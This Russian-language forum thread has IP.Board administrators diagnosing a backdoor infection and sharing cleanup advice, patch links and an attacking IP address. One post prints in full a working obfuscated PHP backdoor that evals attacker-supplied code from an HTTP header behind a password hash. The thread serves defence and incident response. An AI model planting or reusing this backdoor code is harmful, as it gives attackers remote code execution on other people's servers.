ИБРовцы похоже еще спят http://forums.ibresource.ru/index.php?/topic/64826/ :)

если прошурстить у них в /cache/ наверняка и шелл найдется)

 

Патчи от 6 ноября 2012 для ИБР версий

http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70490

http://ipbskins.ru/forum/index.php?showtopic=10798&view=findpost&p=70663

заметил на днях:

в /uploads/monthly 03_2013 (могут оказаться и другие директории)

файлы с точно такими же именами как и jpg, но имебщие расширение .ipb

внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)

лечение - удалить

Backdoor новый обнаружился - \admin\sources\classes\class_private_permissions.php. Инит в class_permissions.php. Код не сохранили, к сожалению. Он поломал авторизацию на форуме, потому и нашли быстро.

Здравствуйте.

Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..

Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием

<?php $_d9eceec="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_d9ecee="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_29d69c=$_d9eceec('',$_d9ecee('aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7'));$_29d69c();?>

, удалил.

Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?

Профи, помогите пожалуйста решить эту проблемку!

Прочтите тему эту от А до Я.

 

Ваше решение.

 

Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile

и пробежитесь по аватарам.

Спасибо.

В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php

с содержанием -

<?php

class alpha
{
public function getOutput()
{
    $template = ipsRegistry::instance()->output->getTemplate('mlist')->member_alpha_ru();

       $js = <<<JS

			<script type='text/javascript'>
				$('alpha_switch').observe('click', function(){
						if( $('member_alpha_ru') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

				$('alpha_switch_en').observe('click', function(){
						if( $('member_alpha') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

JS;
       if ( ord( urldecode(ipsRegistry::$request['quickjump']) ) > 90 )
       {
           $js .= <<<JS
				$('member_alpha').toggle();
JS;
       }
       else
       {
           $js .= <<<JS
				$('member_alpha_ru').toggle();
JS;
       }

       $js .= <<<JS
			</script>
JS;

       return $template . $js;
}
}

Это тоже оно? Вроде бы раньше не было ..

Вроде бы все директории проверил, файл photo-128.jpg удалил (появлялся несколько раз заново), таблицы на предмет -

photo-128.jpg и tmpgw4ia4

почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Он у всех есть.

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Это файл ибровского хука "Русские буквы в списке юзеров"

Спасибо ребята, не дали пропасть!

Вчера обнаружил массовые попытки войти в АЦ форума под отображаемым именем админа с IP:37.1.207.98 . Покурив интернет понял, что не у меня одного ..

Поменяйте путь в АЦ

Поменяйте путь в АЦ

Сразу же сменил. Удивило то, что почти у всех к кому приходили "гости" - форум IPB 3.*.* и один и тот же IP в журналах авторизации АЦ. Бот видит только отображаемое имя, его и вводит при попытке авторизоваться.

Изменено 23 мая 201312 г пользователем Minnow

на одном форуме видел в логах этот ip

пытался авторизоваться под логином IP. Board

очевидно бот решил, что на форуме у админа должен быть логин по названию скрипта